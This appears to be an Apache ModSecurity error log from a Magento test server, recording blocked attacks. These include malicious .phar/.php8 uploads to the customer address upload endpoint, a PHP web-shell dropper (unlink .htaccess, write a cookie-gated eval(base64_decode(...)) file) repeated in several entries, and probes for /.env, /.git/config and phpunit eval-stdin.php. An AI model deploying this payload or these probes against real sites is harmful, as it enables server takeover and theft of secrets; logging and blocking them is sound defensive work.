[Sat Feb 21 20:12:59.490577 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/y/ay88364f428d25.phar"] [unique_id "aZoDu28moWWsvSEyJlkLOAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 20:12:59.733545 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ay88364f428d25.php8 found within FILES:custom_attributes[country_id]: ay88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZoDu28moWWsvSEyJlkLOQAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/y/ay88364f428d25.phar
[Sat Feb 21 20:12:59.734580 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZoDu28moWWsvSEyJlkLOQAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/y/ay88364f428d25.phar
[Sat Feb 21 20:12:59.734834 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZoDu28moWWsvSEyJlkLOQAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/y/ay88364f428d25.phar
[Sat Feb 21 20:13:00.385435 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Rule 7ffa741c5be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/y/ay88364f428d25.php8"] [unique_id "aZoDvG8moWWsvSEyJlkLOgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 20:13:00.386690 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/y/ay88364f428d25.php8"] [unique_id "aZoDvG8moWWsvSEyJlkLOgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 20:13:00.389193 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/y/ay88364f428d25.php8"] [unique_id "aZoDvG8moWWsvSEyJlkLOgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 20:13:00.389418 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/y/ay88364f428d25.php8"] [unique_id "aZoDvG8moWWsvSEyJlkLOgAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 22 02:56:37.589136 2026] [:error] [pid 2246492] [client 209.38.25.156:18328] [client 209.38.25.156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZpiVcr2fFTyo6vQj5Z6HAAAAAY"]
[Sun Feb 22 02:56:37.589406 2026] [:error] [pid 2246492] [client 209.38.25.156:18328] [client 209.38.25.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZpiVcr2fFTyo6vQj5Z6HAAAAAY"]
[Sun Feb 22 02:56:37.589617 2026] [:error] [pid 2246492] [client 209.38.25.156:18328] [client 209.38.25.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZpiVcr2fFTyo6vQj5Z6HAAAAAY"]
[Sun Feb 22 02:56:38.065617 2026] [:error] [pid 2245449] [client 209.38.25.156:18338] [client 209.38.25.156] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aZpiVgoyjSQjVtE376VuYgAAAAc"]
[Sun Feb 22 02:56:38.065827 2026] [:error] [pid 2245449] [client 209.38.25.156:18338] [client 209.38.25.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aZpiVgoyjSQjVtE376VuYgAAAAc"]
[Sun Feb 22 02:56:38.065980 2026] [:error] [pid 2245449] [client 209.38.25.156:18338] [client 209.38.25.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aZpiVgoyjSQjVtE376VuYgAAAAc"]
[Sun Feb 22 02:56:38.305701 2026] [authz_core:error] [pid 2245449] [client 209.38.25.156:18338] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/laravel-filemanager
[Sun Feb 22 02:56:38.305722 2026] [authz_core:error] [pid 2245448] [client 209.38.25.156:18374] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[Sun Feb 22 02:56:38.306767 2026] [:error] [pid 2245445] [client 209.38.25.156:18404] [client 209.38.25.156] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aZpiVhT9mAMkDVq5raH9GwAAAAk"]
[Sun Feb 22 14:57:18.364291 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Rule 7fae86eb8be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/x/ox88364f428d25.phar"] [unique_id "aZsLPn4VhVquovo08xFrNgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 22 14:57:18.364966 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/x/ox88364f428d25.phar"] [unique_id "aZsLPn4VhVquovo08xFrNgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 22 14:57:18.368824 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/x/ox88364f428d25.phar"] [unique_id "aZsLPn4VhVquovo08xFrNgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 22 14:57:18.369113 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/x/ox88364f428d25.phar"] [unique_id "aZsLPn4VhVquovo08xFrNgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 22 14:57:18.534673 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ox88364f428d25.php8 found within FILES:custom_attributes[country_id]: ox88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZsLPn4VhVquovo08xFrNwAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/x/ox88364f428d25.phar
[Sun Feb 22 14:57:18.535352 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZsLPn4VhVquovo08xFrNwAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/x/ox88364f428d25.phar
[Sun Feb 22 14:57:18.535554 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZsLPn4VhVquovo08xFrNwAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/x/ox88364f428d25.phar
[Sun Feb 22 14:57:18.619557 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Rule 7fae86eb8be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/x/ox88364f428d25.php8"] [unique_id "aZsLPn4VhVquovo08xFrOAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 22 14:57:18.620043 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/x/ox88364f428d25.php8"] [unique_id "aZsLPn4VhVquovo08xFrOAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 22 14:57:18.622759 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/x/ox88364f428d25.php8"] [unique_id "aZsLPn4VhVquovo08xFrOAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 22 14:57:18.622984 2026] [:error] [pid 2248142] [client 185.65.202.110:44936] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/x/ox88364f428d25.php8"] [unique_id "aZsLPn4VhVquovo08xFrOAAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 23 09:45:46.318991 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Rule 7faef8bf6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/x/9x88364f428d25.phar"] [unique_id "aZwTutsSW5WxefazdoTFrQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 23 09:45:46.319485 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/x/9x88364f428d25.phar"] [unique_id "aZwTutsSW5WxefazdoTFrQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 23 09:45:46.321975 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/x/9x88364f428d25.phar"] [unique_id "aZwTutsSW5WxefazdoTFrQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 23 09:45:46.322167 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/x/9x88364f428d25.phar"] [unique_id "aZwTutsSW5WxefazdoTFrQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 23 09:45:46.841389 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 9x88364f428d25.php8 found within FILES:custom_attributes[country_id]: 9x88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZwTutsSW5WxefazdoTFrgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/9/x/9x88364f428d25.phar
[Mon Feb 23 09:45:46.842079 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZwTutsSW5WxefazdoTFrgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/9/x/9x88364f428d25.phar
[Mon Feb 23 09:45:46.842283 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZwTutsSW5WxefazdoTFrgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/9/x/9x88364f428d25.phar
[Mon Feb 23 09:45:47.284003 2026] [:error] [pid 2269589] [client 176.195.127.156:56760] [client 176.195.127.156] ModSecurity: Rule 7faef8bf6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/x/9x88364f428d25.php8"] [unique_id "aZwTu9sSW5WxefazdoTFrwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
